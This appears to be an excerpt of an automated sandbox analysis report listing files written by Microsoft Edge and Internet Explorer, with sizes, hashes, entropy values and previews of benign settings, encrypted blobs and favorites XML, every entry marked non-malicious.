              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):35
              Entropy (8bit):4.014438730983427
              Encrypted:false
              SSDEEP:
              MD5:BB57A76019EADEDC27F04EB2FB1F1841
              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
              Malicious:false
              Reputation:unknown
              Preview:{"forceServiceDetermination":false}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):81
              Entropy (8bit):4.3439888556902035
              Encrypted:false
              SSDEEP:
              MD5:177F4D75F4FEE84EF08C507C3476C0D2
              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
              Malicious:false
              Reputation:unknown
              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):130439
              Entropy (8bit):3.80180718117079
              Encrypted:false
              SSDEEP:
              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
              Malicious:false
              Reputation:unknown
              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):40
              Entropy (8bit):4.346439344671015
              Encrypted:false
              SSDEEP:
              MD5:6A3A60A3F78299444AACAA89710A64B6
              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
              Malicious:false
              Reputation:unknown
              Preview:synchronousLookupUris_638343870221005468
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):57
              Entropy (8bit):4.556488479039065
              Encrypted:false
              SSDEEP:
              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
              Malicious:false
              Reputation:unknown
              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):29
              Entropy (8bit):4.030394788231021
              Encrypted:false
              SSDEEP:
              MD5:52E2839549E67CE774547C9F07740500
              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
              Malicious:false
              Reputation:unknown
              Preview:topTraffic_638004170464094982
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):575056
              Entropy (8bit):7.999649474060713
              Encrypted:true
              SSDEEP:
              MD5:BE5D1A12C1644421F877787F8E76642D
              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
              Malicious:false
              Reputation:unknown
              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:raw G3 (Group 3) FAX, byte-padded
              Category:dropped
              Size (bytes):460992
              Entropy (8bit):7.999625908035124
              Encrypted:true
              SSDEEP:
              MD5:E9C502DB957CDB977E7F5745B34C32E6
              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
              Malicious:false
              Reputation:unknown
              Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):86
              Entropy (8bit):4.3751917412896075
              Encrypted:false
              SSDEEP:
              MD5:F732DBED9289177D15E236D0F8F2DDD3
              SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
              SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
              SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
              Malicious:false
              Reputation:unknown
              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):70301
              Entropy (8bit):6.102477068466515
              Encrypted:false
              SSDEEP:
              MD5:AE296FAA5DCC34181430925AE1DA5873
              SHA1:69084D44900A5C3D38819EFE6E30E7389573B6DB
              SHA-256:568A7FD145A8F5FFC776FB66DAC20F1274A7160D36C16227C69DAA209224C11E
              SHA-512:DA8EF654ED7F237C9B3910200A40E72FCEF6CF24E1A33272BB9E126C0BBD47DFAAB92723FEB6822CE622AF21E0C578F3C047E37BB829C71142899C1E55E2EE9F
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1709204289"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):70301
              Entropy (8bit):6.102475982152077
              Encrypted:false
              SSDEEP:
              MD5:158E577DBAD138D1394889F92B8AF126
              SHA1:9925E13DB98FBDE9D5F13CB9E534FAAA8470C15D
              SHA-256:7B496E1D084F77E4C52204122F14D53168864D9AD4EA1B51AB0A96524D7B9165
              SHA-512:72B696BDABF03A801F7E94B7919F511553F1728D5509ECFBA360CE75C68BA9BE6CC74CCE677C8083E7F886932D748442B9773D22EBD51FCA988AE494FDDFE8BE
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1709204289"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):70114
              Entropy (8bit):6.1025753210350695
              Encrypted:false
              SSDEEP:
              MD5:852F7B9278F751CA35DC526C8D84F75D
              SHA1:F9A9E8BD73E7E32EA79C0FA7CCD8FAB29BB0D3D6
              SHA-256:116FA88CD70547C7E8572C41E15328F495111DC41B16DF274EE6CE52C78ED61E
              SHA-512:AA7C80F5E1C8F33471E70842C79B45C4B9488AB6D1812CC512E418189C39E32F4AA7A6BEB44274605FFCE8D576F434BD2BA0930199E87B501DDD65DDD3E2219D
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"0"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8Fb10d7yBz
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):70205
              Entropy (8bit):6.102364811462683
              Encrypted:false
              SSDEEP:
              MD5:92097036E745A8EBA0CBF428ED775781
              SHA1:0121381B193C1449A6BC910A8314878A7868504B
              SHA-256:40F44FD13DEB10C9988DC83890964070C9A40DC687CC44C5464047FE4B6755FB
              SHA-512:F6AB71C298C3A0259DCD562AA0F0DE34497BA83512BB47B7FC6FC6FBD918FBFD1F4F74F80AEB4CC6204AD4215C36F0C194BAB4FC20B52A00CF15FF28F4F32C5A
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1709204289"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:modified
              Size (bytes):4096
              Entropy (8bit):2.1330126312745397
              Encrypted:false
              SSDEEP:
              MD5:6B1BD3A00FD8094CF0AC25D8546FD207
              SHA1:D21729E7FC693A05C186879673204E281F6251C7
              SHA-256:705D301066BF5E886B1AB73E7F31ECE532C5252900C08AE3C13CED7BECF55C38
              SHA-512:90E45AF44D4E100D0FF7AD3C9871B905D3C3722026C44584AFF747410E29BE1A759D38E6BAC1002A932ABE1DB48E8D11EA57F1402AFAE6C4D9568950C826698A
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y...........................................................................................UM.j................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.5.q.n.+.Y.v.H.W.7.h.G.M.L.+.z.0.u.#.8.l.i.w.=.=.........:.......................................
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):1.7524996042617798
              Encrypted:false
              SSDEEP:
              MD5:D8075DA5DFF0D5ACA323BA3E10A22CDD
              SHA1:4ADBA16F29E4A5B4D00853E8C61CDCDF25BF2FFC
              SHA-256:2A59FDC930CD4BD9AE0E6C71AFBFF5C77B8052AC834AEDF85D3977F7EC0F1740
              SHA-512:158CE63745A6E5490F32B08578603B29877C56FBC179B91AEB63EBF0DE3273B07B1868054B7D8AB3E6FED236280CA5F10955B9B510662D859F22A6956D7302C2
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................P..%.j................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):1.6679930523464803
              Encrypted:false
              SSDEEP:
              MD5:F504BBF02C399741F078080B58FE3BC3
              SHA1:B6E9CABC1B607FB19FB15CA43503A5D27D895DE4
              SHA-256:081467AE8F104953D9151D90A12488B182F136F9F7708BDF02EECCA95CB64195
              SHA-512:2E79713CD1FE62CA6B40736ED4ED16FAC7DB8271A5832554C6F6B1B9F148DB988EEC91DE03E11A580689856493D3F8AD782C386D94D55F9D16DD9CD49EAB10A4
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................gSM.j................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
              Category:dropped
              Size (bytes):356
              Entropy (8bit):5.106009227635222
              Encrypted:false
              SSDEEP:
              MD5:B4FD331691375F6097D7ECDB97280C64
              SHA1:C3F3B52FA5587B2F8BA847D1F2C3C605C62CC775
              SHA-256:5D95B5E6F5CE189578837019CED6789BF2BBDC86482620824FEE925304F6BFC0
              SHA-512:2B3D04D506B7C7D2B921C63F8263AACEAA2B65225646045BC592E3D4230661D73E4ED0C87CF202369B34F667684A73087CDA3AA883CDC70928B8EF9E06E9032D
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x299607b6,0x01da6afe</date><accdate>0x29987977,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
              Category:dropped
              Size (bytes):354
              Entropy (8bit):5.1309752619979
              Encrypted:false
              SSDEEP:
              MD5:3FD5B3C22174E22F804C7EE9DE36F661
              SHA1:56D728B630834A7C48C7DA63702B713F7251A432
              SHA-256:2533FB5D28D0ACFE894AF4990F4AA10DFCA024D40562F6F4D780409A0350E940
              SHA-512:A8A1FB3FD79DB0BF5273CCEBE706A149D7879FC491D76AC7D5694A1D0059972DDD160FC1002BAA8290FFE4DE6FD311B1B08FFA7B72A6F5FA634625AFC9B3E3F8
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x2989fa27,0x01da6afe</date><accdate>0x298c6b08,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (318), with CRLF line terminators
              Category:dropped
              Size (bytes):360
              Entropy (8bit):5.1267487134218115
              Encrypted:false
              SSDEEP:
              MD5:AF147FB0579E077DD2F40F7B8FA54824
              SHA1:DCCB8BFB92C1FB4C77CC5E0D15E42E7AEC9F30C1
              SHA-256:BD46414848F9F170B353CD2772A5F0FAA4A83E12E6AA566BC6E3DA4BD657EB30
              SHA-512:76B23B3AA6301102F8C10DB4C3C97308254704EEFF1333069BB23CD80FAAA0F207292DE502F6F74DCCC6545CA7FFFD7285D27AB86A6CB6CCDC48B178EA238D88
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x29987977,0x01da6afe</date><accdate>0x29987977,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
              Category:dropped
              Size (bytes):377
              Entropy (8bit):5.181613416380942
              Encrypted:false
              SSDEEP:
              MD5:1157038E34224E47E12CB8FA6B64C3B0
              SHA1:E3D6080E3F528358E5E3DDBF1E3CA7F81AB8DBD0
              SHA-256:4C37290913421B0A9580CDEF7D7FAD02B0664CC95B3E9B48453F998DAF3C722E
              SHA-512:53260AD34CD9D0C9E70F06A08A6A81AD37C06D24CD576DADA29220EAA10679B61E830C894871222611AC3C93563D25D2923A8295F021864AAAF257995E043802
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0x298c6b08,0x01da6afe</date><accdate>0x298eb58d,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
              Category:dropped
              Size (bytes):350
              Entropy (8bit):5.120523153586562
              Encrypted:false
              SSDEEP:
              MD5:9E0BC3C8AE544C3BD69B2F6263C6006B
              SHA1:9E4D17FD3B6A57979BBECF735D7A3284F6610021
              SHA-256:D6A7ADEA899C477E8F3CD676624CE910580667B595273CD7FDF985DE68518165
              SHA-512:F61EC7FE66C8A76AF37772C99E55B17219B7517235313A0822B6A107BFC17A54738A04D61130D3329E7E0BCACCD2982118BF8E21D2141B29F7BA0299568B56FF
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x29939729,0x01da6afe</date><accdate>0x29939729,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
              Category:dropped
              Size (bytes):356
              Entropy (8bit):5.1223677053994345
              Encrypted:false
              SSDEEP:
              MD5:239C56C0BD4F9C89A07A272CB1F35932
              SHA1:E8E167F8E3E29D6A55F379250C07BFD106A5566C
              SHA-256:314461EEAA71E88469C5B614595D25ACD1B0B88881DB328546E9D26F5D669CD4
              SHA-512:5928898234E365FD90C54AEB9FF281614A8639C96F29C24F50A0DD271C7A356D868D20C62635512B13046F14A315EBCDA91E9C7FAB33C86E8CEEB7AD36CEAB00
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x29987977,0x01da6afe</date><accdate>0x299ae9ad,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
              Category:dropped
              Size (bytes):354
              Entropy (8bit):5.104191873388496
              Encrypted:false
              SSDEEP:
              MD5:6B0149C6A94FF8438C716C05847340C2
              SHA1:150776B516BF93D987FCCD578FDEB328D88417D9
              SHA-256:D86B58BF1AA0AFDA3D9F6A1ABBA3A398B3622E0FADEE386EA739C3E3625A5BBA
              SHA-512:836F36C2C8FB2F9D95451C81BADC74ED4D0D215C727385974DC5D46C0C03BDB50984874F53E4419D3C6A620FA47AB5A90EB19C12CD36F5F754B5EAD6DC6299C0
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x299607b6,0x01da6afe</date><accdate>0x299607b6,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
              Category:dropped
              Size (bytes):356
              Entropy (8bit):5.1541337692384825
              Encrypted:false
              SSDEEP:
              MD5:90E717117510F498B52A87DC87A2B3E7
              SHA1:12419D02939086716CDDBEF7BF22CEC862B4695B
              SHA-256:1A48C77C3B90BED3AFF4B4AB8470553FF029A7D53D7A80213762B0BFCC0118D4
              SHA-512:1C10CC16CAF47F87F094B6FCD200F2EB839B8C1658289A3DCDC8FF267D0E6F78513B9778FD259481F78570521697A260E2D922FC7F7B8ED75ACE154B61C2F60E
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x29939729,0x01da6afe</date><accdate>0x29939729,0x01da6afe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
              Process:C:\Program Files\Internet Explorer\iexplore.exe
              File Type:XML 1.0 document, ASCII text, with very long lines (316), with CRLF line terminators
              Category:dropped
              Size (bytes):358
